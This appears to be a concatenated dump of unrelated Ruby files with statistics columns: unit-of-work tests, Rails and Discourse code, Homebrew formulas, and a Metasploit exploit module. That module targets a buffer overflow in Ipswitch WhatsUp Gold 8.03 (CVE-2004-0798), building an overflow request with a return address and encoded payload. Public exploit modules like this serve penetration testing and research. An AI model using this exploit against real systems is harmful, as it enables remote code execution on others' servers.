assert_same aggregate_c, @uow.register_aggregate(aggregate_d, event_bus, &storage_callback)
end
should 'interact with a transaction manager on commit' do
listener = UnitOfWorkListener.new
tx = Object.new
txm = Object.new
mock(txm).start {
tx
}
mock(listener).on_start(@uow).ordered
mock(listener).on_prepare_commit(@uow, anything, anything).ordered
mock(listener).on_prepare_transaction_commit(@uow, tx).ordered
mock(txm).commit(tx).ordered
mock(listener).after_commit(@uow).ordered
mock(listener).on_cleanup(@uow).ordered
@uow.transaction_manager = txm
@uow.register_listener listener
@uow.start
@uow.commit
end
should 'interact with a transaction manager on rollback' do
listener = UnitOfWorkListener.new
tx = Object.new
txm = Object.new
mock(txm).start {
tx
}
mock(listener).on_start(@uow).ordered
mock(txm).rollback(tx).ordered
mock(listener).on_rollback(@uow, nil).ordered
mock(listener).on_cleanup(@uow).ordered
@uow.transaction_manager = txm
@uow.register_listener listener
@uow.start
@uow.rollback
end
should 'register a listener with the current unit of work if it is unaware of nesting' do
outer_unit = Object.new
mock(outer_unit).register_listener(is_a(OuterCommitUnitOfWorkListener))
mock(outer_unit).rollback
@provider.push outer_unit
inner_unit = create_uow
inner_unit.rollback
outer_unit.rollback
@provider.clear outer_unit
end
should 'roll back inner units if the outer unit is rolled back' do
outer_unit = create_uow
inner_unit = create_uow
listener = UnitOfWorkListener.new
mock(listener).on_rollback(inner_unit, nil)
inner_unit.register_listener listener
inner_unit.commit
outer_unit.rollback
end
should 'commit inner units after the outer unit is committed' do
outer_unit = create_uow
inner_unit = create_uow
committed = false
listener = UnitOfWorkListener.new
mock(listener).after_commit(inner_unit) {
committed = true
}
inner_unit.register_listener listener
inner_unit.commit
refute committed, 'Inner unit was committed prematurely'
outer_unit.commit
assert committed, 'Inner unit should have been committed'
end
should 'rollback if a listener raises an exception while preparing to commit' do
cause = TestError.new
listener = UnitOfWorkListener.new
mock(listener).on_prepare_commit(@uow, anything, anything) {
raise cause
}
mock(listener).on_rollback(@uow, cause)
mock(listener).after_commit.never
mock(listener).on_cleanup(@uow)
@uow.register_listener listener
@uow.start
assert_raises TestError do
@uow.commit
end
end
should 'rollback if an aggregate storage callback raises an exception' do
aggregate_root = Object.new
stub(aggregate_root).add_registration_listener
stub(aggregate_root).id
event_bus = Object.new
cause = TestError.new
listener = UnitOfWorkListener.new
mock(listener).on_prepare_commit(@uow, anything, anything)
mock(listener).on_rollback(@uow, cause)
mock(listener).after_commit.never
mock(listener).on_cleanup(@uow)
@uow.start
@uow.register_listener listener
@uow.register_aggregate aggregate_root, event_bus do |aggregate|
raise cause
end
assert_raises TestError do
@uow.commit
end
end
should 'rollback if the event bus raises an exception when publishing events' do
cause = TestError.new
event = Object.new
event_bus = Object.new
mock(event_bus).publish([event]) {
raise cause
}
listener = UnitOfWorkListener.new
mock(listener).on_event_registered(@uow, event) {
event
}
mock(listener).after_commit.never
@uow.start
@uow.register_listener listener
@uow.publish_event event, event_bus
assert_raises TestError do
@uow.commit
end
end
should 'delay cleanup of inner unit after commit until outer unit is committed' do
outer_listener = UnitOfWorkListener.new
inner_listener = UnitOfWorkListener.new
outer_unit = create_uow
inner_unit = create_uow
outer_unit.register_listener outer_listener
inner_unit.register_listener inner_listener
mock(inner_listener).after_commit(inner_unit).ordered
mock(outer_listener).after_commit(outer_unit).ordered
mock(inner_listener).on_cleanup(inner_unit).ordered
mock(outer_listener).on_cleanup(outer_unit).ordered
inner_unit.commit
outer_unit.commit
end
should 'delay cleanup of inner unit after rollback until outer unit is committed' do
outer_listener = UnitOfWorkListener.new
inner_listener = UnitOfWorkListener.new
outer_unit = create_uow
inner_unit = create_uow
outer_unit.register_listener outer_listener
inner_unit.register_listener inner_listener
mock(inner_listener).on_rollback(inner_unit, nil).ordered
mock(outer_listener).after_commit(outer_unit).ordered
mock(inner_listener).on_cleanup(inner_unit).ordered
mock(outer_listener).on_cleanup(outer_unit).ordered
inner_unit.rollback
outer_unit.commit
end
should 'delay cleanup of inner unit after commit until outer unit is rolled back' do
outer_listener = UnitOfWorkListener.new
inner_listener = UnitOfWorkListener.new
outer_unit = create_uow
inner_unit = create_uow
outer_unit.register_listener outer_listener
inner_unit.register_listener inner_listener
mock(inner_listener).on_prepare_commit(inner_unit, anything, anything).ordered
mock(inner_listener).on_rollback(inner_unit, nil).ordered
mock(outer_listener).on_rollback(outer_unit, nil).ordered
mock(inner_listener).on_cleanup(inner_unit).ordered
mock(outer_listener).on_cleanup(outer_unit).ordered
inner_unit.commit
outer_unit.rollback
end
should 'raise an exception if a transaction manager is set after the unit has been started' do
@uow.start
assert_raises RuntimeError do
@uow.transaction_manager = Object.new
end
@uow.commit
end
should 'not put the unit of work provider into a bad state if the unit of work fails during start' do
txm = Object.new
mock(txm).start {
raise 'Something bad happened'
}
@uow.transaction_manager = txm
begin
@uow.start
rescue RuntimeError; end
refute @provider.started?
end
should 'continually publish events as events are published' do
@uow.start
event_bus = EventBus::SimpleEventBus.new
event_a = Domain::EventMessage.build
event_b = Domain::EventMessage.build
listener = Object.new
mock(listener).notify(event_a) {
@uow.publish_event event_b, event_bus
}
mock(listener).notify(event_b)
event_bus.subscribe listener
@uow.publish_event event_a, event_bus
@uow.commit
end
private
def create_uow
uow = UnitOfWork.new @provider
uow.start
uow
end
end
class TestError < StandardError; end
class TestAggregateA
include Domain::AggregateRoot
def initialize(id)
@id = id
end
end
class TestAggregateB
include Domain::AggregateRoot
def initialize(id)
@id = id
end
end
end
end
| 28.151335 | 107 | 0.651523 |
9113bb30ce287b8ed534b055c438689da8ad052f | 770 | class User < ApplicationRecord
has_many :instruments, inverse_of: :user, dependent: :destroy
has_many :songs, inverse_of: :user, dependent: :destroy
has_many :elements, through: :songs, inverse_of: :user, dependent: :destroy
validates :email, :username, :password, :password_confirmation, presence: true
validates :email, :username, uniqueness: { case_sensitive: false }
has_secure_password
def self.find_or_create_from_auth_hash(auth)
where(provider: auth.provider, uid: auth.uid).first_or_create do |user|
user.provider = auth.provider
user.uid = auth.uid
user.email = auth.info.email
user.username = auth.info.name
user.password = SecureRandom.hex
user.password_confirmation = user.password
user.save
end
end
end
| 32.083333 | 80 | 0.74026 |
26f80cff3fcc0b45e9f313544f0cdc9a590dd8ab | 587 | require 'ddtrace/contrib/cucumber/formatter'
module Datadog
module Contrib
module Cucumber
# Instrumentation for Cucumber
module Instrumentation
def self.included(base)
base.send(:prepend, InstanceMethods)
end
# Instance methods for configuration
module InstanceMethods
attr_reader :datadog_formatter
def formatters
@datadog_formatter ||= Datadog::Contrib::Cucumber::Formatter.new(@configuration)
[@datadog_formatter] + super
end
end
end
end
end
end
| 23.48 | 92 | 0.637138 |
ab787c67be6f9714b6cba248f455f35fdf687c83 | 2,659 | ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = GreatRanking
# [*] x.x.x.x WhatsUp_Gold/8.0 ( 401-Basic realm="WhatsUp Gold" )
HttpFingerprint = { :pattern => [ /WhatsUp/ ] }
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Ipswitch WhatsUp Gold 8.03 Buffer Overflow',
'Description' => %q{
This module exploits a buffer overflow in IPswitch WhatsUp Gold 8.03. By
posting a long string for the value of 'instancename' in the _maincfgret.cgi
script an attacker can overflow a buffer and execute arbitrary code on the system.
},
'Author' => [ 'MC' ],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2004-0798'],
['OSVDB', '9177'],
['BID', '11043'],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Privileged' => true,
'Payload' =>
{
'Space' => 500,
'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",
'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44",
},
'Platform' => 'win',
'Targets' =>
[
[ 'WhatsUP Gold 8.03 Universal', { 'Ret' => 0x6032e743 } ], # whatsup.dll
],
'DefaultTarget' => 0,
'DisclosureDate' => '2004-08-25'))
register_options(
[
OptString.new('HTTPUSER', [ true, 'The username to authenticate as', 'admin']),
OptString.new('HTTPPASS', [ true, 'The password to authenticate as', 'admin']),
])
end
def exploit
c = connect
num = rand(65535).to_s
user_pass = "#{datastore['HTTPUSER']}" + ":" + "#{datastore['HTTPPASS']}"
req = "page=notify&origname=&action=return&type=Beeper&instancename="
req << rand_text_alpha_upper(811, payload_badchars) + "\xeb\x06"
req << make_nops(2) + [target.ret].pack('V') + make_nops(10) + payload.encoded
req << "&beepernumber=&upcode=" + num + "*&downcode="+ num + "*&trapcode=" + num + "*&end=end"
print_status("Trying target %s..." % target.name)
res = send_request_cgi({
'uri' => '/_maincfgret.cgi',
'method' => 'POST',
'content-type' => 'application/x-www-form-urlencoded',
'data' => req,
'headers' =>
{
'Authorization' => "Basic #{Rex::Text.encode_base64(user_pass)}"
}
}, 5)
handler
end
end
| 32.426829 | 99 | 0.547574 |
4ae42ff1db6d9a04e52aa4f1a1feadab35e71ab9 | 1,209 | class Ftjam < Formula
desc "Build tool that can be used as a replacement for Make"
homepage "https://www.freetype.org/jam/"
url "https://downloads.sourceforge.net/project/freetype/ftjam/2.5.2/ftjam-2.5.2.tar.bz2"
sha256 "e89773500a92912de918e9febffabe4b6bce79d69af194435f4e032b8a6d66a3"
bottle do
cellar :any_skip_relocation
sha256 "f94287203827dea6ac5031e695c217a48b1b69e939dcd68a489c8477b4100447" => :el_capitan
sha256 "95490ead99e537713d8c26d1c1bea72b31ea06153a405867ffe83c044593caa0" => :yosemite
sha256 "554e527a1e52be6ebd9f5f1fbae4e8f648f750a179936e329238dee32b32520a" => :mavericks
end
conflicts_with "jam", because: "both install a `jam` binary"
def install
system "./configure", "--prefix=#{prefix}"
system "make"
system "make", "install"
end
test do
(testpath/"Jamfile").write <<-EOS.undent
Main ftjamtest : ftjamtest.c ;
EOS
(testpath/"ftjamtest.c").write <<-EOS.undent
#include <stdio.h>
int main(void)
{
printf("FtJam Test\\n");
return 0;
}
EOS
assert_match "Cc ftjamtest.o", shell_output(bin/"jam")
assert_equal "FtJam Test\n", shell_output("./ftjamtest")
end
end
| 29.487805 | 92 | 0.703888 |
f8276d9dcc656217fdef8d197383b8c2b56ef50e | 1,396 | # frozen_string_literal: true
DiscourseEvent.on(:site_setting_changed) do |name, old_value, new_value|
# Enabling `must_approve_users` on an existing site is odd, so we assume that the
# existing users are approved.
if name == :must_approve_users && new_value == true
User.where(approved: false).update_all(approved: true)
end
if name == :emoji_set
Emoji.clear_cache
before = "/images/emoji/#{old_value}/"
after = "/images/emoji/#{new_value}/"
Scheduler::Defer.later("Fix Emoji Links") do
DB.exec("UPDATE posts SET cooked = REPLACE(cooked, :before, :after) WHERE cooked LIKE :like",
before: before,
after: after,
like: "%#{before}%"
)
end
end
Report.clear_cache(:storage_stats) if [:backup_location, :s3_backup_bucket].include?(name)
if name == :slug_generation_method
Scheduler::Defer.later("Null topic slug") do
Topic.update_all(slug: nil)
end
end
Jobs.enqueue(:update_s3_inventory) if [:enable_s3_inventory, :s3_upload_bucket].include?(name)
Jobs.enqueue(:update_private_uploads_acl) if name == :prevent_anons_from_downloading_files
SvgSprite.expire_cache if name.to_s.include?("_icon")
if SiteIconManager::WATCHED_SETTINGS.include?(name)
SiteIconManager.ensure_optimized!
end
if SiteSetting::WATCHED_SETTINGS.include?(name)
SiteSetting.reset_cached_settings!
end
end
| 29.702128 | 99 | 0.716332 |
bbd66907252c5adbcf1fd3a1f73d81e89f82416c | 687 | cask "banktivity" do
version "8.7.7"
sha256 "63c3c30da83d4f4f131686d7d4f23975e0afb531e8a029256ae4aa551795b49f"
url "https://www.iggsoft.com/banktivity/Banktivity#{version}.dmg",
verified: "iggsoft.com/"
name "Banktivity"
desc "App to manage bank accounts in one place"
homepage "https://www.iggsoftware.com/banktivity/"
livecheck do
url "https://www.iggsoft.com/banktivity/banktivity-versions-feed.json"
regex(/"version"\s*:\s*"(\d+(?:\.\d+)+)"/i)
end
depends_on macos: ">= :catalina"
app "Banktivity.app"
zap trash: [
"~/Library/Application Scripts/com.iggsoftware.banktivity",
"~/Library/Containers/com.iggsoftware.banktivity",
]
end
| 27.48 | 75 | 0.704512 |
1ac1529b96c3bfc1b4e24b0845d0a8511a2f1daa | 271 | package 'explicit_action' do
action :lock
end
package 'with_attributes' do
version '1.0.0'
action :lock
end
package 'specifying the identity attribute' do
package_name 'identity_attribute'
action :lock
end
package %w(with array) do
action :lock
end
| 15.055556 | 46 | 0.730627 |
26456611b9bee589228d9e37eac66ece7daae718 | 55 | json.array! @duties, partial: 'duties/duty', as: :duty
| 27.5 | 54 | 0.690909 |
875195cd525598e96045957370238a81634f0e53 | 543 | namespace :env do
desc 'Ensure every non optional ENV variable is defined.'
task :lint => :load do
formatter = EnvLint::Formatter.new
begin
EnvLint.verify_hash(env_definition_file, ENV)
formatter.ok('env looks ok')
rescue EnvLint::MissingVariables => e
formatter.missing_variables(e.dot_env_file, e.missing_variables)
abort
rescue EnvLint::Error => e
formatter.error(e.message)
end
end
task :load do
end
def env_definition_file
ENV['DEFINITION'] || '.env.example'
end
end
| 22.625 | 70 | 0.683241 |
6a29562142dc98918b64b14edbde96e16ac98cba | 296 | module DmUniboCommon
class PermissionPolicy < ApplicationPolicy
def index?
@user.is_cesia?
end
def show?
@user.is_cesia?
end
# only superuser
def create?
@user.is_cesia?
end
# only superuser
def update?
create?
end
def destroy?
update?
end
end
end
| 11.384615 | 42 | 0.658784 |
f756592f448fad84fad2215cd5df5b40d2ff0dc6 | 103 | class ApplicationMailer < ActionMailer::Base
default from: '[email protected]'
layout 'mailer'
end
| 17.166667 | 44 | 0.757282 |
e236dff908296ebfd81d207abb7f2adc08a34120 | 1,202 | # Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
module Azure::Subscriptions::Mgmt::V2019_10_01_preview
module Models
#
# The ID of the subscriptions that is being renamed
#
class RenamedSubscriptionId
include MsRestAzure
# @return [String] The ID of the subscriptions that is being renamed
attr_accessor :value
#
# Mapper for RenamedSubscriptionId class as Ruby Hash.
# This will be used for serialization/deserialization.
#
def self.mapper()
{
client_side_validation: true,
required: false,
serialized_name: 'RenamedSubscriptionId',
type: {
name: 'Composite',
class_name: 'RenamedSubscriptionId',
model_properties: {
value: {
client_side_validation: true,
required: false,
read_only: true,
serialized_name: 'value',
type: {
name: 'String'
}
}
}
}
}
end
end
end
end
| 25.574468 | 74 | 0.5599 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.